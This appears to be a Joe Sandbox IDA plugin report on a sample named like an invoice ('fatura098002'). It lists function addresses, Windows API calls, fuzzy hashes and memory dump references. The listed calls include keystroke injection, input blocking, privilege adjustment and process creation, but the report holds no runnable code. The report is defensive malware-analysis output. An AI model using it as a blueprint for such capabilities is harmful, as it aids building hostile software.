Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: LongWindow$DialogMessageNtdllProc_Send
String ID:
API String ID: 1273190321-0
Opcode ID: 37cd8d1a37c57d82228b347ebf730b9371de035591fde7b67ccb5fed3680daa5
Instruction ID: 3bf249cacca6ba79691d49965821e70e6da06e2ece256839a2a0075fd1770561
Opcode Fuzzy Hash: 37cd8d1a37c57d82228b347ebf730b9371de035591fde7b67ccb5fed3680daa5
Instruction Fuzzy Hash: C901B131101208FBEF219F18EC59EA63BB6FB85365F104069FA510B2E1C73A6852DB64

Function 007737B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00784891,?,?,00000035,?), ref: 007737E4
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00784891,?,?,00000035,?), ref: 007737F4

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 27d0f1600d63853b2fff288b2989a0e1e6f1e2dbc7c70ed3c358ab470e679cd5
Instruction ID: a1e40ddb0c13ca78dc4b011687fe583e3844748f45aef3a2f85fbb754d15ea39
Opcode Fuzzy Hash: 27d0f1600d63853b2fff288b2989a0e1e6f1e2dbc7c70ed3c358ab470e679cd5
Instruction Fuzzy Hash: 1BF0E5B16052286AEF2027768C8DFEB3BAEEFC47A1F004265F509D2281DA749945C6F0

Function 00799400 Relevance: 3.0, APIs: 2, Instructions: 32nativeCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00799423
NtdllDialogWndProc_W.NTDLL(?,00000200,?,00000000,?,?,00000000,00000000,?,0075776C,?,?,?,?,?), ref: 0079944C

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: ClientDialogNtdllProc_Screen
String ID:
API String ID: 3420055661-0
Opcode ID: 47b94a2339599fcb3755dc6a6035ac9fcebdbba0f0cccd157ad457aef618c95b
Instruction ID: 38f4e0af7a128787caaec50f788f8b4812daa4367584dc045268afdd93282a33
Opcode Fuzzy Hash: 47b94a2339599fcb3755dc6a6035ac9fcebdbba0f0cccd157ad457aef618c95b
Instruction Fuzzy Hash: 16F03A72400218FFEF058F95DC09DAE7BB8EB44351F10805AF905A2160D379AA61DB64

Function 0076B226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0076B25D
keybd_event.USER32(?,7608C0D0,?,00000000), ref: 0076B270

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: 3d2da09b7a9b79832f07000b6d89c9e34b6cd97ed0297daae7a6c633f68cff7f
Instruction ID: 8c6d4368bf1ed30ca47700c265179c25b4a385d98c971355c21f2cb052e8e5d9
Opcode Fuzzy Hash: 3d2da09b7a9b79832f07000b6d89c9e34b6cd97ed0297daae7a6c633f68cff7f
Instruction Fuzzy Hash: 0AF01D7180428DAFDF059FA0C806BAE7BB4FF09305F10801AF955A5192D37D86519F94

Function 007610BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,007611FC), ref: 007610D4
CloseHandle.KERNEL32(?,?,007611FC), ref: 007610E9

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 54ad3c58b0e5589c1264c3d52d1a2ce6ab52eeef3062444634c5258de9b12414
Instruction ID: b9d0b160cf9e949a0ec485d8914fa797fbeccec56b43463b988fbe4108d3a7e4
Opcode Fuzzy Hash: 54ad3c58b0e5589c1264c3d52d1a2ce6ab52eeef3062444634c5258de9b12414
Instruction Fuzzy Hash: DBE0BF72018610EEEB262B55FD09EB777A9EB04310F14C82EF5A6804B1DB666CE1DB54

Function 0079953A Relevance: 3.0, APIs: 2, Instructions: 21nativeCOMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 00799542
NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,007576FB,?,?,?,?), ref: 0079956C

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: 28ebbeda1dddbde9b6aba901a08d2904e9076dd6b0dc8499004c5f87e6a5e9af
Instruction ID: 819383d91faa8f73c397ffbf525a63fa28c6c156f38e0bcf50bff50f2ff41c64
Opcode Fuzzy Hash: 28ebbeda1dddbde9b6aba901a08d2904e9076dd6b0dc8499004c5f87e6a5e9af
Instruction Fuzzy Hash: 9DE08630104214B7FF160F19DC0AFBA3B14E704B91F10811AFA57980E1D7B59AE0D264

Function 0073676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00736766,?,?,00000008,?,?,0073FEFE,00000000), ref: 00736998

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 742971870c6ed0ba55785ee8140d278427fe088dc443383e6509e39fe0beb8fc
Instruction ID: cc0fab2389ba7a45aba82b7298f0f6e2e47c4a0176ade43954df9bd85759e910
Opcode Fuzzy Hash: 742971870c6ed0ba55785ee8140d278427fe088dc443383e6509e39fe0beb8fc
Instruction Fuzzy Hash: F8B12C71610609AFE715CF28C48ABA57BE0FF45364F25C658E8D9CF2A2C739E991CB40

Function 0071B119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON

Download Yara Rule

Strings

, xrefs: 0075851F

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 2d5890819bfb61315dbaed9570a8b5346a04576adc1ad1e7091cf6b19e1424e5
Instruction ID: 8a22d354e55fb25df1c29329fa619ea91b91d093520811e22832821f57431c5e
Opcode Fuzzy Hash: 2d5890819bfb61315dbaed9570a8b5346a04576adc1ad1e7091cf6b19e1424e5
Instruction Fuzzy Hash: 5C125F71900229DFDB54CF58C8806EEB7F5FF48710F14819AE849EB291EB789E85CB91

Function 0079A2D7 Relevance: 1.6, APIs: 1, Instructions: 68nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00719BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00719BB2

NtdllDialogWndProc_W.NTDLL(?,00000112,?,?), ref: 0079A38F

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: 2ea19d315ffb93d7abb0479287ab0afaf533757da010d53734b3070d200ff65c
Instruction ID: 3559da047707f26c9a6d8026b7acdea202da26a568cb4df4cbc673955d0b9c94
Opcode Fuzzy Hash: 2ea19d315ffb93d7abb0479287ab0afaf533757da010d53734b3070d200ff65c
Instruction Fuzzy Hash: 4B115B34205650BAFF256B2CED1AFBD3B64DB82760F248325F9114E2E2CB6C5D41D2E6

Function 007987B2 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00719944: GetWindowLongW.USER32(?,000000EB), ref: 00719952

CallWindowProcW.USER32(?,?,00000020,?,?), ref: 007987F3

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Window$CallLongProc
String ID:
API String ID: 4084987330-0
Opcode ID: 2d89b3228395e145dcb8f21bd8f4dd255b8084b1f7bb817fe9dd570c2b23df80
Instruction ID: 6c32bb215d9a25b48fa9d389c204cefc48d60f11bedd131d40b6e3e0e6912ebb
Opcode Fuzzy Hash: 2d89b3228395e145dcb8f21bd8f4dd255b8084b1f7bb817fe9dd570c2b23df80
Instruction Fuzzy Hash: 50F04931104008EFCF45AF94EC54CB93BA6EB0A360B508019F9114B6A1CB3AADB1EBA5

Function 00798AAA Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00719BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00719BB2

Part of subcall function 0071912D: GetCursorPos.USER32(?), ref: 00719141
Part of subcall function 0071912D: ScreenToClient.USER32(00000000,?), ref: 0071915E
Part of subcall function 0071912D: GetAsyncKeyState.USER32(00000001), ref: 00719183
Part of subcall function 0071912D: GetAsyncKeyState.USER32(00000002), ref: 0071919D

NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,00757818,?,?,?,?,?,00000001,?), ref: 00798AF8

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
String ID:
API String ID: 2356834413-0
Opcode ID: a691ba328a2a3902cdf792a61062dd780312867b83cbc86942becb1d5edfa15f
Instruction ID: 4d452d973fd3fea1aeb3f124320d5d5bbef12eb01a4b558c4051ea3f05b8aed4
Opcode Fuzzy Hash: a691ba328a2a3902cdf792a61062dd780312867b83cbc86942becb1d5edfa15f
Instruction Fuzzy Hash: A3F0A770100219FBDF15AF19DC1EEFA3F61EB017A0F004016F9161A291CBBA99E1EBE5

Function 00719052 Relevance: 1.5, APIs: 1, Instructions: 27nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00719BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00719BB2

NtdllDialogWndProc_W.NTDLL(?,00000006,?,?,?), ref: 00719096

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: afef32040afc218c6c9c7b1a601678690b8311186e91e41ebc25f46a04256023
Instruction ID: 1d86a8a2911914ab22b54723e1a2521c27e1c84b1bdd479976459ed4c7a54b3e
Opcode Fuzzy Hash: afef32040afc218c6c9c7b1a601678690b8311186e91e41ebc25f46a04256023
Instruction Fuzzy Hash: 69F08930600209EFDB18CF15D8656753B72FB45760F64811DF9520A2E0C73B99D2E760

Function 0077EAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 0077EABD

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 874c211f098a8c7dc31cf970b503fcee1830891f9836194fa47ee67a1373352f
Instruction ID: 963e8b5201a36433b32d196d83a6c41dc4fbcdea0dad3a3d7ff789e3946169ec
Opcode Fuzzy Hash: 874c211f098a8c7dc31cf970b503fcee1830891f9836194fa47ee67a1373352f
Instruction Fuzzy Hash: 51E01A32200204DFCB10EF59D808E9AB7E9AF9D7A0F01C456FC49C7291DA78A8418B91

Function 00799380 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON

Download Yara Rule

APIs

NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 007993C0

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: DialogNtdllProc_
String ID:
API String ID: 3239928679-0
Opcode ID: 8a07a9ac8256c436aefbe99734bef64c417b24aea438a52651b70c4e335b0a6c
Instruction ID: 14718d04e6f16ea1ec00fc359178212b1f1f5e37eaec9c1a864ffbd94da3b3a1
Opcode Fuzzy Hash: 8a07a9ac8256c436aefbe99734bef64c417b24aea438a52651b70c4e335b0a6c
Instruction Fuzzy Hash: 44F06D31201294BFEF21DF58EC15FC63BA5EB06360F148019BA25272E1CB757960E764

Function 007190A7 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00719BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00719BB2

NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?), ref: 007190D5

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: b13aaa89b1fd2995deab9f49c80a78aa704bc2a5232e5c192ac16958e7b05f94
Instruction ID: 926ccb736ad41294debff245c4e903870fcbc4bd49a301665fcec85fcb4f6553
Opcode Fuzzy Hash: b13aaa89b1fd2995deab9f49c80a78aa704bc2a5232e5c192ac16958e7b05f94
Instruction Fuzzy Hash: 1EE0EC35500204FBDF15AF94DC26EA43B36FB49790F108019FA151A2A1CA3BA9A2DB54

Function 007993CB Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON

Download Yara Rule

APIs

NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,00757723,?,?,?,?,?,?), ref: 007993F6

Part of subcall function 00798172: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,007D3018,007D305C), ref: 007981BF
Part of subcall function 00798172: CloseHandle.KERNEL32 ref: 007981D1

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: CloseCreateDialogHandleNtdllProc_Process
String ID:
API String ID: 4178364262-0
Opcode ID: d1ba9cafa5163fdefe99a98e42c2c4c0d3f17d57d2191cd4836ac0645f284c06
Instruction ID: f2c15b503e6c60d66a0781bc22f7aae10ed331c8bfd11778c3293c088b190422
Opcode Fuzzy Hash: d1ba9cafa5163fdefe99a98e42c2c4c0d3f17d57d2191cd4836ac0645f284c06
Instruction Fuzzy Hash: 60E04631100208EFDF02AF58EC65E863B72FB08351F018009FA11172B2CB36ADA1EF14

Function 00718BA4 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00719BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00719BB2

Part of subcall function 00718BCD: DestroyWindow.USER32(?), ref: 00718C81
Part of subcall function 00718BCD: KillTimer.USER32(00000000,?,?,?,?,00718BBA,00000000,?), ref: 00718D1B

NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?), ref: 00718BC3

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin
